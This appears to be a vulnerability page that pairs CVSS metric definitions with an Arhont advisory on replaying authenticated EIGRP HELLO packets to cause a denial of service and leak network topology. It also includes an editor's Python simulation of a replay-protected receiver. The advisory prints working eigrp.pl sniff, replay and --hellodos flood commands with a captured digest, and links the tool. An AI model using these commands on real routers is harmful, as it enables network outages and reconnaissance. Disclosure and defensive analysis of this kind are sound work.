Attack Vector
Network
AV
The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include:
- a remote attacker is able to send packets to a target system
- a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Arhont Ltd.- Information Security
Arhont Advisory by: Arhont Ltd
Advisory: Authenticated EIGRP DoS / Information leak
Class: design bug
Version: EIGRP version 1.2
Model Specific: Other versions might have the same bug
DETAILS:
From experiments with capturing a variety of authenticated EIGRP packets and
replaying them back at the router, it appears that the MD5 algorithm is run
against only the following packet fields: Opcode, AS number, Flags, Sequence
Number, Nexthop. Since none of these fields changes between successive HELLO
packets (a HELLO carries Seq 0/0, as in the debug output below), the presence
of a Message Authentication Code (MAC) does not stop attackers from replaying
HELLO packets back at the router. The only condition needed is to sniff the
hash and throw it back at the EIGRP routers. An example of this would be:
1. Sniff
arhontus# ./eigrp.pl --sniff --iface eth0
<skip>
<<<Authentication data: 0002>>>
Size: 40
Key ID: 2
MD5 key digest: efe07403446c77a9697fe5753f79e52
Key in one string (Copy & paste to replay)
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
2. Replay
arhontus#./eigrp.pl --hello --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
The router accepts the replayed packets and answers with an EIGRP UPDATE,
which can be sniffed to learn more about the network topology:
061751: 04:13:46: EIGRP: received packet with MD5 authentication, key id = 2
061752: 04:13:46: EIGRP: Received HELLO on Ethernet0/0 nbr 192.168.66.112
061753: 04:13:46: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/1
061754: 04:13:46: EIGRP: Sending UPDATE on Ethernet0/0 nbr 192.168.66.112, retry 2, RTO 4500
061755: 04:13:46: AS 1, Flags 0x9, Seq 2162/0 idbQ 1/0 iidbQ un/rely 0/0 peerQ un/rely 0/1 serno 3-8
As a result, additional information about the EIGRP domain can be collected
from the triggered UPDATE packets.
Besides, using this method the FX EIGRP/ARP DoS attack (BID 6443) can be
ported to the authenticated EIGRP routing domain. This is done by combining
the --hellodos and --auth <captured hash> flags when running the attack with
our EIGRP packet generator. The attack appears to be more efficient than the
original attack described by FX, since the routers recover much more slowly,
possibly because of the additional overhead of processing the authentication
information. An example of the attack command that takes the network down
would be:
arhontus#./eigrp.pl --hellodos 192.168.66.0 --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52 --source 192.168.66.112
Tool: http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz
Risk Factor: Medium for DoS, Low for the Information Leak
Workarounds: Extend the Message Authentication Code onto the currently
unauthenticated EIGRP packet fields. Note that this defeats replay only if
the MAC also covers a value that changes with every packet and that the
receiver checks for freshness (for example a per-packet sequence number or
timestamp); a MAC over additional but static HELLO fields would still let a
captured digest be replayed.
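As an added example (editor's code, not part of the advisory and not the eigrp.pl tool), the following Python models why the captured digest keeps working for both the information leak and the --hellodos flood described above: the MAC covers only fields that are identical in every HELLO, so a router that merely verifies the MAC accepts every replayed copy. It also parses the authentication data printed in the sniff step. Assumptions: the TLV field layout (auth type, auth length, key ID, key sequence, zero padding, digest) is inferred from the dump; the keyed MD5 is a simplified stand-in for Cisco's construction; the Router class, the "counter" freshness field and the shared key are hypothetical. The hardened variant illustrates the workaround caveat: the MAC must cover a per-packet value that the receiver checks for freshness.

```python
"""Model of the authenticated EIGRP HELLO replay, plus a parser for the
authentication data eigrp.pl printed.  Editor's illustrative code: the digest
is a simplified keyed MD5, not Cisco's construction, and the TLV field layout
is assumed from the advisory's dump."""
import hashlib
import hmac
import struct
from ipaddress import IPv4Address
from typing import Dict, Optional

# Authentication data as printed by the advisory's sniff step (copied from the page).
CAPTURED_AUTH_HEX = (
    "00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52"
)
OPCODE_HELLO = 5  # EIGRP HELLO opcode


def parse_auth_tlv(hex_value: str) -> Dict[str, object]:
    """Assumed layout: auth type (2 bytes), auth length (2), key ID (4),
    key sequence (4), zero padding, digest of 'auth length' bytes.  Split on
    the hex text because the tool dropped the digest's leading zero in its
    per-field output, so the blob is not trusted to be byte-aligned."""
    auth_type = int(hex_value[0:4], 16)   # 2 = MD5
    auth_len = int(hex_value[4:8], 16)    # 16 for MD5
    if len(hex_value) < 24 + 2 * auth_len:
        raise ValueError("TLV value too short for the stated digest length")
    pad_hex = hex_value[24:-2 * auth_len]
    if pad_hex.strip("0"):
        raise ValueError("non-zero padding: layout assumption does not hold")
    return {"auth_type": auth_type, "auth_len": auth_len,
            "key_id": int(hex_value[8:16], 16),
            "key_seq": int(hex_value[16:24], 16),
            "digest": hex_value[-2 * auth_len:]}


def hello_digest(key: bytes, asn: int, flags: int, seq: int, src: str,
                 counter: Optional[int] = None) -> bytes:
    """Keyed digest over the fields the advisory reports as covered (opcode,
    AS, flags, sequence, next hop modelled as the source address).  With
    'counter' set, a per-packet value is covered too (hardened variant)."""
    covered = struct.pack("!BIII", OPCODE_HELLO, asn, flags, seq) + IPv4Address(src).packed
    if counter is not None:
        covered += struct.pack("!I", counter)
    return hashlib.md5(key + covered).digest()  # simplified keyed MD5 stand-in


class Router:
    """Receiver.  replay_protect=False mirrors the advisory: any packet with a
    valid digest is processed, however many times it has been seen."""

    def __init__(self, key: bytes, replay_protect: bool = False) -> None:
        self.key, self.replay_protect = key, replay_protect
        self.last_counter: Dict[str, int] = {}  # highest counter seen per neighbour
        self.processed = 0

    def receive(self, pkt: dict) -> bool:
        counter = pkt.get("counter") if self.replay_protect else None
        if self.replay_protect and counter is None:
            return False  # freshness value is mandatory when enforced
        expected = hello_digest(self.key, pkt["asn"], pkt["flags"], pkt["seq"],
                                pkt["src"], counter)
        if not hmac.compare_digest(expected, pkt["digest"]):
            return False  # bad MAC
        if self.replay_protect:
            if counter <= self.last_counter.get(pkt["src"], -1):
                return False  # already seen from this neighbour: replay
            self.last_counter[pkt["src"]] = counter
        self.processed += 1
        return True


def legit_hello(key: bytes, src: str, counter: Optional[int] = None) -> dict:
    """A neighbour's HELLO: AS 1, flags 0, Seq 0, as in the debug output."""
    pkt = {"asn": 1, "flags": 0, "seq": 0, "src": src}
    if counter is not None:
        pkt["counter"] = counter
    pkt["digest"] = hello_digest(key, 1, 0, 0, src, counter)
    return pkt


def simulate(replay_protect: bool, flood: int = 1000) -> Dict[str, object]:
    """Sniff one legitimate HELLO, replay it 'flood' times with the captured
    digest (what --hellodos --auth does), then try to bump the freshness
    counter without the key.  Returns what the router let through."""
    key = b"example-eigrp-key"  # hypothetical shared secret, unknown to the attacker
    router = Router(key, replay_protect)
    legit = legit_hello(key, "192.168.66.112", counter=1 if replay_protect else None)
    router.receive(legit)  # the packet the attacker sniffs
    replays_accepted = sum(router.receive(dict(legit)) for _ in range(flood))
    bumped = dict(legit)
    bumped["counter"] = 2  # attacker cannot re-sign this without the key
    return {"replays_accepted": replays_accepted,
            "counter_bump_accepted": router.receive(bumped),
            "processed": router.processed}


if __name__ == "__main__":
    print("vulnerable:", simulate(False))
    print("hardened:  ", simulate(True))
    print("captured TLV:", parse_auth_tlv(CAPTURED_AUTH_HEX))
```

The vulnerable router processes all 1000 replayed copies plus the counter-bumped one, since nothing it checks ever changes; the hardened router processes the first HELLO only, rejecting the replays on the counter and the bumped packet on the MAC. The parsed digest carries one more leading 0 than the tool's "MD5 key digest" line, which printed only 31 hex digits.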
Communication History: sent to PSIRT on 10/10/05
*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before releasing them to the public domains (such as CERT and BUGTRAQ).
If you would like to get more information about this issue, please do
not hesitate to contact Arhont team.*